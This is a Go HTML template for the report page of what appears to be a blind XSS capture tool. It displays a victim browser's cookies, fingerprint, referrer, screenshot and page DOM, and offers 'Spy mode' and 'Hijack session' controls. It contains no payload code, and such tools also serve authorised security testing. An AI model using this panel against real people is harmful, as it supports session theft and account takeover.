{{template "layout" .}}
{{define "title"}}Report{{end}}

{{define "main"}}
<dialog id="spy-modal">
    <article>
        <a href="#close" aria-label="Close" class="close" data-target="spy-modal" onClick="toggleModal(event)"></a>
        <h3>Spy</h3>

        <div id="#spyfeed">
            NO FEED
        </div>

        <footer>
            <a href="#cancel" role="button" class="secondary" data-target="spy-modal" onClick="toggleModal(event)"> Disable </a>
            <a href="#confirm" role="button" data-target="spy-modal" onClick="toggleModal(event)"> Enable </a>
        </footer>
    </article>
</dialog>

<h2>
    <i class="fa fa-file-text"></i> Report - ID {{.ID}}
</h2>

<div class="grid">
    <article>
        <header><i class="fa fa-laptop"></i> <b>Trigger info</b></header>

        <div><b>Status:</b> N/A</div>
        <div><b>Date:</b> {{.Date}}</div>
        <div><b>RemoteAddress:</b> {{.RemoteAddr}}<a href="https://whois.domaintools.com/{{.RemoteAddr}}"><i class="fa fa-external-link"></i></a></div>
        <div><b>Host:</b> {{.Host}}<a href="https://whois.domaintools.com/{{.Host}}"><i class="fa fa-external-link"></i></a></div>
        <div><b>Payload:</b> {{.Payload}}</div>
    </article>

    <article>
        <header><i class="fa fa-plane"></i> <b>Browser info</b></header>

        <div><b>Fingerprint:</b> {{.UID}} </div>
        <div><b>UserAgent:</b> {{.UserAgent}}</div>
        <div><b>BrowserDate:</b> {{.BrowserDate}}</div>
        <div><b>Referrer:</b> {{.Referrer}}</div>
        <div><b>URI:</b> <a href="{{.URI}}">{{.URI}}</a></div>
        <div><b>Origin:</b> {{.Origin}}</div>
        <div><b>Cookies:</b> {{.Cookies}}</div>
    </article>
    
    <article>    
        <header><i class="fa fa-cogs"></i> <b>Controls</b></header>

        <div>
            <button type="button" data-tooltip="Spy mode" data-target="spy-modal" onClick="toggleModal(event)"><i class="fa fa-user-secret"></i></button>
            <button type="button" data-tooltip="Hijack session" onclick="window.location.href='/triggers/hijack?id={{.ID}}'"><i class="fas fa-skull"></i></button>
            <button type="button" class="secondary" data-tooltip="Delete report" onclick="window.location.href='/triggers/delete?id={{.ID}}'"><i class="fas fa-trash"></i></button>
        </div>
    </article>
</div>

<div>
    <article>
        <header> 
            <i class="far fa-file-image"></i> <b>Screenshot:</b>
        </header>
        <a href="/get/screenshot?id={{ .ID }}"><img src="/get/screenshot?id={{ .ID }}"></a>
        <footer>
            <details>
                <summary><i class="fa fa-code"></i> View page DOM</summary>
                <textarea readonly> {{.DOM}} </textarea>
            </details>
        </footer>
    </article>
    
</div>
{{end}}